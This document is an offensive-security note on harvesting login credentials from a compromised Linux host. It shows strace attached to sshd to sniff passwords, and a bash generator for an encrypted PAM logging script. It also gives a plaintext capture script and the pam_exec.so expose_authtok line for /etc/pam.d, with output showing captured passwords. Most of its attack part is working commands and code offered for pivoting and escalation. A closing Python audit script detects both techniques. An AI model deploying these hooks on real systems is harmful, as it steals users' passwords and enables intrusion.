Sniffing Passwords
Strace
With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts.
[root@victimHost ~]# w
15:05:18 up 26 days, 6:25, 2 users, load average: 0.00, 0.05, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
unixadm pts/0 someHost 15:04 6.00s 0.03s 0.00s sshd: unixadm [priv]
[root@victimHost ~]# ps aux | grep ssh
root 1366 0.0 0.0 113000 4368 ? Ss Jun02 0:00 /usr/sbin/sshd -D
unixadm 28721 0.0 0.0 176412 2644 ? S 10:04 0:00 sshd: unixadm@pts/0
[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached
PAM
With root access on a server we can create a simple bash script to log all authentication requests handled by pam.d. The log data will show a timestamp, username, password and source IP, all in cleartext. This is of course very useful when trying to pivot and/or escalate privileges.
Encrypted logs
The helper script below creates a new script, pam_log.sh, to be uploaded to a target host.
#!/bin/bash
# Paths for the generated key pair and for the log script that gets uploaded.
KEY_DIR="./ssh_key_pair"
PRIVATE_KEY_PATH="${KEY_DIR}/pam-id_rsa"
PUBLIC_KEY_PATH="${KEY_DIR}/pam-id_rsa.pub"
PEM_KEY_PATH="${KEY_DIR}/pam-id_rsa.pem"
LOG_SCRIPT_PATH="./pam_log.sh"
mkdir -p "$KEY_DIR"
echo "[+] Generating SSH key pair..."
ssh-keygen -t rsa -b 4096 -m PEM -f "$PRIVATE_KEY_PATH" -N "" >/dev/null
echo "[+] Extracting public key in PEM format..."
ssh-keygen -e -f "$PUBLIC_KEY_PATH" -m PEM > "${PEM_KEY_PATH}"
# Collapse the PEM block to one line so it can be embedded in the generated script.
SSH_PUBLIC_KEY=$(cat "${PEM_KEY_PATH}" | sed ':a;N;$!ba;s/\n/\\n/g')
echo "[+] Creating the log script..."
cat <<EOF > "$LOG_SCRIPT_PATH"
#!/bin/bash
SSH_PUBLIC_KEY="$SSH_PUBLIC_KEY"
# pam_exec provides PAM_USER and PAM_RHOST in the environment and, with expose_authtok, the password on stdin.
LOG_ENTRY=" \$(date) \${PAM_USER}, \$(cat -), From: \${PAM_RHOST}"
echo "\$LOG_ENTRY" | openssl pkeyutl -encrypt -inkey <(echo -e "\$SSH_PUBLIC_KEY" | sed 's/\\n/\n/g') -pubin | base64 >> /var/log/creds.log
EOF
chmod +x "$LOG_SCRIPT_PATH"
echo "[+] Generated log script: $LOG_SCRIPT_PATH"
echo -e "\n[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey $PRIVATE_KEY_PATH"
kdev :: ~/log » ./create_pam_log.sh
[+] Generating SSH key pair...
[+] Extracting public key in PEM format...
[+] Creating the log script...
[+] Generated log script: ./pam_log.sh
[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
Upload pam_log.sh to the target and modify /etc/pam.d/common-auth to execute the script on authentication requests.
kdev :: ~ » echo "auth optional pam_exec.so quiet expose_authtok /home/void/log/pam_log.sh" | sudo tee -a /etc/pam.d/common-auth
Wait for a user to log in and reap the rewards. Other users are unable to read the content without having the private key.
kdev :: ~/log » cat /var/log/creds.log
WNGIdThHgz[...]Hww2aa0=
kdev :: ~/log » cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
Fri Mar 14 11:18:14 CET 2025 void, Passw0rd!, From: ::1
Unencrypted logs
If you don't care about the security aspects, or if the target doesn't have openssl or base64 installed, you can instead use this simple unencrypted version to log authentication requests.
## Create the simple script to log logins
$ chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log
## Create the log file and restrict its permissions so no unauthorized user can read it
$ touch /var/log/creds.log
$ chmod 600 /var/log/creds.log
## Edit /etc/pam.d/common-auth and add the following line
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh
## All services using PAM will now be logged to /var/log/creds.log in clear text
➜ ~ cat /var/log/creds.log
Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: ::1
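From the defensive side, both techniques on this page leave visible traces: a pam_exec.so line carrying expose_authtok in /etc/pam.d, and an sshd process with a non-zero TracerPid in /proc/<pid>/status while strace is attached. The following audit script is an added example, not part of the original note; it parses those two sources, and the PAM config and status text used in its test are constructed samples.

```python
"""Audit a Linux host for the two credential-capture hooks discussed here:
pam_exec.so with expose_authtok in /etc/pam.d, and a ptrace (strace)
attachment to sshd, visible as TracerPid in /proc/<pid>/status."""
import glob
import os
import re

# A PAM line whose module is pam_exec.so; the control field may be a keyword
# (optional, required) or a bracketed expression containing spaces.
PAM_EXEC_RE = re.compile(
    r"^\s*-?(?:auth|account|password|session)\s+"
    r"(?:\[[^\]]*\]|\S+)\s+\S*pam_exec\.so\b(.*)$")

def find_pam_exec_hooks(config_text):
    """Return (program, exposes_password) for each pam_exec.so line; an entry
    with expose_authtok receives the cleartext password on stdin."""
    hooks = []
    for line in config_text.splitlines():
        m = PAM_EXEC_RE.match(line)
        if m:
            args = m.group(1).split()
            program = next((a for a in args if a.startswith("/")), None)
            hooks.append((program, "expose_authtok" in args))
    return hooks

def tracer_pid(status_text):
    """Parse TracerPid from /proc/<pid>/status text (0 means not traced)."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split()[1])
    return 0

def audit_host(pam_dir="/etc/pam.d", proc="/proc"):
    """Walk the live system and return the findings as a list of strings."""
    findings = []
    for path in sorted(glob.glob(os.path.join(pam_dir, "*"))):
        with open(path) as f:
            for program, exposed in find_pam_exec_hooks(f.read()):
                flag = " with expose_authtok" if exposed else ""
                findings.append(f"{path}: pam_exec runs {program}{flag}")
    for status in glob.glob(os.path.join(proc, "[0-9]*", "status")):
        try:
            with open(status) as f:
                text = f.read()
        except OSError:  # process exited or status not readable
            continue
        if text.startswith("Name:\tsshd") and tracer_pid(text):
            pid = status.split(os.sep)[-2]
            findings.append(f"sshd pid {pid} is traced by pid {tracer_pid(text)}")
    return findings
```

Run `audit_host()` as root so every /proc/<pid>/status is readable; a legitimate pam_exec hook (for example a login notifier) shows up as an informational entry without the expose_authtok flag.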